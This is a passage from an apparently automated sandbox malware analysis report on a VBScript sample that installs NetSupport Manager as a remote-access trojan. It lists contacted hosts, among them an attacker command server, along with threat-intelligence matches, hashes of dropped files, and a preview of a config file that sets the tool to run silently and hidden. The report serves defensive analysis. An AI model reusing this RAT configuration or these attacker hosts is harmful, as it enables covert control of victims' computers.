                                                                                                        https://www.netsupportschool.com/ios-android/111wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, checkdvd.exe, 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, MSI3FCC.tmp, 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, winst64.exe, 00000021.00000000.2613701112.00007FF778F25000.00000008.00000001.01000000.0000000F.sdmp, MSI51C1.tmp, 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, pcicfgui_client.exe, 00000024.00000002.2676316225.000000006A967000.00000004.00000001.01000000.0000001F.sdmp, PCICL32.DLL.22.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.netsupportsoftware.com/supportmsiexec.exe, 00000015.00000003.2484064535.000000000309F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000015.00000003.2485726143.000000000308C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.symauth.com/cps0(wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drfalse
                                                                                                          		high
                                                                                                          https://github.com/Pester/PesterPyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://localhost/ApprovedWebList.htmPrintSurveyInternet6pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://geo.netsupportsoftware.com/location/loca.aspLatLongcloseclient32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drfalse
                                                                                                              		high
                                                                                                              ftp://http://HTTP/1.0client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.symauth.com/rpa00wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drfalse
                                                                                                                  		high
                                                                                                                  https://stackoverflow.com/q/2152978/23354Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.netsupportsoftware.commmsiexec.exe, 00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://okolinabeauty.com/Pyyidau.vbs.exe, 00000003.00000002.1882351312.000000000B95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    176.126.113.166
                                                                                                                    		okolinabeauty.comUkraine
                                                                                                                    		9063SAARGATE-ASVSENETGmbHDEtrue
                                                                                                                    185.170.144.66
                                                                                                                    		megaeth1337.duckdns.orgunknown
                                                                                                                    		59753VDWELLEREEtrue
                                                                                                                    104.26.0.231
                                                                                                                    		geo.netsupportsoftware.comUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1561295
                                                                                                                    Start date and time:2024-11-23 02:36:07 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 13m 0s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:46
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:1
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:Pyyidau.vbs
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.bank.troj.expl.evad.winVBS@72/246@3/3
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 97%
                                                                                                                    • Number of executed functions: 101
                                                                                                                    • Number of non-executed functions: 326
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .vbs

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target Pyyidau.vbs.exe, PID 2916 because it is empty
                                                                                                                    • Execution Graph export aborted for target msiexec.exe, PID 6332 because there are no executed function
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    20:37:05API Interceptor42x Sleep call for process: Pyyidau.vbs.exe modified
                                                                                                                    20:38:25API Interceptor1x Sleep call for process: msiexec.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    104.26.0.231file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • geo.netsupportsoftware.com/location/loca.asp

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    geo.netsupportsoftware.comfile.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • 104.26.0.231
                                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • 104.26.0.231
                                                                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 104.26.0.231
                                                                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 104.26.0.231
                                                                                                                    72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • 172.67.68.212
                                                                                                                    hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • 104.26.0.231
                                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • 104.26.1.231
                                                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                    • 104.26.1.231
                                                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 172.67.68.212
                                                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    • 172.67.68.212

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    VDWELLEREEna.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.170.144.84
                                                                                                                    kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.170.144.84
                                                                                                                    https://bbavnetcash-empreasasnet.lat/local_pibee/login_pibee.php/Get hashmaliciousUnknownBrowse
                                                                                                                    • 185.170.144.32
                                                                                                                    10J.zipGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                    • 185.73.125.96
                                                                                                                    bIgxdEEcXm.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                    • 185.73.125.96
                                                                                                                    efekactk.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.73.124.161
                                                                                                                    efekactk.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.73.124.161
                                                                                                                    bGNq1S744A.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.73.124.17
                                                                                                                    bGNq1S744A.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.73.124.17
                                                                                                                    Hq0UKVWTFV.exeGet hashmaliciousIcedID Raccoon SmokeLoader VidarBrowse
                                                                                                                    • 185.170.144.51
                                                                                                                    SAARGATE-ASVSENETGmbHDEsora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 195.66.5.164
                                                                                                                    arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.168.9.126
                                                                                                                    8LNER6Tma8.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                    • 176.126.114.74
                                                                                                                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                    • 176.126.113.11
                                                                                                                    SecuriteInfo.com.Linux.Siggen.9999.16227.30183.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 195.66.5.171
                                                                                                                    45.128.232.240-mips-2024-07-06T07_07_43.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 195.66.5.151
                                                                                                                    DRKi1Olgjp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 91.184.172.177
                                                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 213.185.75.253
                                                                                                                    2cO52KdAG9.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 213.185.75.229
                                                                                                                    0ar3q66pGv.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 213.185.75.254
                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 172.67.162.84
                                                                                                                    file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                    • 172.64.41.3
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 104.21.33.116
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 172.67.162.84
                                                                                                                    es.htaGet hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.140.237
                                                                                                                    https://fax-review-complete-signature-required.s3.us-east-1.amazonaws.com/Derwiiuw45FSDeerwyllakttqyhfffddd/ASgggsh65378Reloadfffax3527paogHjkks/Pdf.htmlGet hashmaliciousUnknownBrowse
                                                                                                                    • 172.66.46.242
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 172.67.162.84
                                                                                                                    https://stewartforeverfarm.com/stewartforeverfarm.shtml%C2%A0Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                    • 104.21.33.116
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 172.64.41.3

                                                                                                                    JA3 Fingerprints

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza StealerBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    exe010.exeGet hashmaliciousUpatreBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 176.126.113.166

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Config.Msi\3b1427.rbs

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):42744
                                                                                                                    Entropy (8bit):5.779639077996684
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:XqjRjFBBtktktktktktktjoQeBG2LshKsFmua:KjFAQl2IrXa
                                                                                                                    MD5:01D42FABC042B5D7F74ACD63DBBAA598
                                                                                                                    SHA1:0DEB8DBC9DB2F9B8864331EB05501711155BBC63
                                                                                                                    SHA-256:82BD8812241E95AC077A502D0E1AD64BDE1E136F7CC640DD0A23C164E55053AD
                                                                                                                    SHA-512:F4625AD8AF024A8908A2D3795AB84747C3A270C05A5F2ABBEBF1B2A1281D98DAC219CF7318A6FD729C21B8246C7F12EA90A53A58A4B0AE864AA2F28652E4FD07
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Config.Msi\3b1427.rbs, Author: Joe Security
                                                                                                                    Preview:...@IXOS.@.....@.vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopDrivers....CloseGatewayTrayIcon....CloseGatewayApp....ProcessComponents..Updating component registration..&.{68985C0A-F4D4-4570-AE52-E556EED30C8C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{CBD15933-2EDA-4A68-B11B-B3A1E0540ABB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{0C0D3B0B-63FD-42B8-9FCE-56A33E5FE94C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{D69F2005-3C0D-4683-90A1-EC4B5AD43C4B}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{783CBD0A-FEA7-407C-B450-1E275B3563DB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{6AB92F9D-58CE-4729-BE0F-FF3C1181ADC5}&.{CBB68368-7767-4CFF-B3

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):82400
                                                                                                                    Entropy (8bit):6.714981336409031
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:a6Y+3bZm8/vLk957pyPkD/bFRFpmPcW+gee/AjHG6ee/gjHB:a6Y+rQ8/Tk9Rp5zFpmPl+gepjm6eljh
                                                                                                                    MD5:F60CE9D311CEE59250BAFAC6E6F1593A
                                                                                                                    SHA1:4838E4FD7F855BA75C55D9D1AD56A87347E91ABA
                                                                                                                    SHA-256:5029A368137EF90609E81A7F691743C1804A5DBFC40AE65540DB4831FD2A2087
                                                                                                                    SHA-512:E4FDD1D011BAA90DBF17CB3BB0C02BF82B450ED153D45E511BEA03427607B51AFCF201E9EBC18E567D9F5F17531AABB1A70A4E594CE0D1AAEC5AD3D41C6CEF8E
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\...........7......................:....................2......3......4....Rich...........................PE..L...&.oe...........!.....|...d......E1............0.......................... ......b...............................@...-...t...P.......X................]..........`..................................@...............(............................text....z.......|.................. ..`.rdata..m6.......8..................@..@.data...`...........................@....rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):833
                                                                                                                    Entropy (8bit):5.511102445378548
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:+BhzEPmPT8FVXR8piBlnxOoK1fXXfDH2ijr6cgEW3ZxA2U6L:+BtuK+VXypGlnxJK1fHfXj+cg3ZD
                                                                                                                    MD5:1F0F5E39677EEDA38AADC289DEBCC482
                                                                                                                    SHA1:57E5EA3A82BC22791D1B0317514EF179E8169FB7
                                                                                                                    SHA-256:7A8D6223702D4049C4106867A5D53370977F5CC59E48964CCB5C48EBB2CAA630
                                                                                                                    SHA-512:20BCA25C4405F8627F20AD14A692CED65F1B293B77C995F7969784A38F8CCA518F40117CF3907D7282019BA4C54531314361C2312466685BAB90709B4AAE234E
                                                                                                                    Malicious:false
                                                                                                                    Preview:0x2634664d....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.upd

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):25
                                                                                                                    Entropy (8bit):4.243856189774724
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:tekKKv0ov:JR8y
                                                                                                                    MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                                                    SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                                                    SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                                                    SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                                                    Malicious:false
                                                                                                                    Preview:[Client]..RoomSpec=Eval..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):104928
                                                                                                                    Entropy (8bit):6.462496520992136
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:Pm0oPFxNrTUEtzjHlBs/Z5GQFvSeGjreejq:loxrTUEtFBsPGIaemeN
                                                                                                                    MD5:0488F2B6A068F6FAD881A45E427068A2
                                                                                                                    SHA1:B1E6B587D1F1A18C3E8F324C06BDE36608DF11A2
                                                                                                                    SHA-256:E4227BED56D1EA54FE8D4A0D60F68C1B805433F5A083C889F1EBE61D5901654E
                                                                                                                    SHA-512:56A2615AA3BF101430830C6832E494B2448CF8BCE1DA850AC0A9F6D55304508851590D360666B8926369E1FA925514F544BD5BA24E02192113018B6869079499
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^..?...?...?...I...?...G...?...G...?...?...?...I...?...I...?...I...?...I...?...I...?..Rich.?..................PE..d...}.oe.........." ................TX..............................................q...............................................p&...............p..\....`.......<...]..............................................................p............................text............................... ..`.rdata...W.......X..................@..@.data....$...0......................@....pdata.......`....... ..............@..@.rsrc...\....p......................@..@.reloc...............6..............@..B................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Control.kbd

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3926
                                                                                                                    Entropy (8bit):5.282899777821006
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:IQIT9RO30TdADA/kAqJNdzzpd47J69Tb1UgzP5DrwBt2U7xwZViSdMD+cGrr1AP2:qTKcMAkLvX47JE1UgzJUtDiO+Lrr1As9
                                                                                                                    MD5:4D9E1C4B8A78F4C8D6CE5235D42C8F1E
                                                                                                                    SHA1:6BD13DC34A053F0F40A0D77241AA4BD1EB4DFC42
                                                                                                                    SHA-256:6D098726CBCDB392BC3A43D4D218072F5CADD4B82D83ADA87BCE65F7642AF602
                                                                                                                    SHA-512:52953FC6A3474A682436C17AD8308C83514AA20CFFD1844E78426EA809FAFC1F2A2FEDDB09BC7F4D12996728D5017C816CF58AFE3B7CE6B79DC2557BAD7564DE
                                                                                                                    Malicious:false
                                                                                                                    Preview:; Keyboard layout file for NetSupport Control..;..; Format of this file is:..; keyboard layout name..; special key mappings..; repeated as often as desired..;..; Special key mappings take the form:..; scancode=character scancode=character .....; where scancode is a hexadecimal number..; (if >= 80 hex, the SHIFTED key is mapped)..; (if >= 100 hex, the ALT Gr key is mapped)....Unmapped Keyboard..FE=x..UK enhanced (102 key) keyboard..83=" 84=. A8=@ 29=` A9=. 2B=# AB=~ 56=\ D6=|....US enhanced (102 key) keyboard..83=@ 84=# A8=" 29=` A9=~ 2B=\ AB=| 56=\ D6=|....German enhanced (102 key) keyboard..29=^ a9=. 103=. 84=. 104=. 88=/ 108={ 89=( 109=[ 8a=) 10a=] 8b== 10b=} 0c=. 8c=? 10c=\ 0d=. 8d=` 110=@ 112=. 15=z 95=Z 1a=. 9a=. 1b=+ 9b=* 11b=~ 27=. a7=. 28=. a8=. ab=' 56=< d6=> 156=| 2c=y ac=Y 132=. b3=; b4=: 35=- b5=_ ....French enhanced (102 key) keyboard..29=. 02=& 82=1 03=. 83=2 103=~ 04=" 84=3 104=# 05=' 85=4 105={ 06=( 86=5 106=[ 07=- 87=6 107=| 08=. 88=7 108=` 09=_ 89=8 109=\ 0A

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
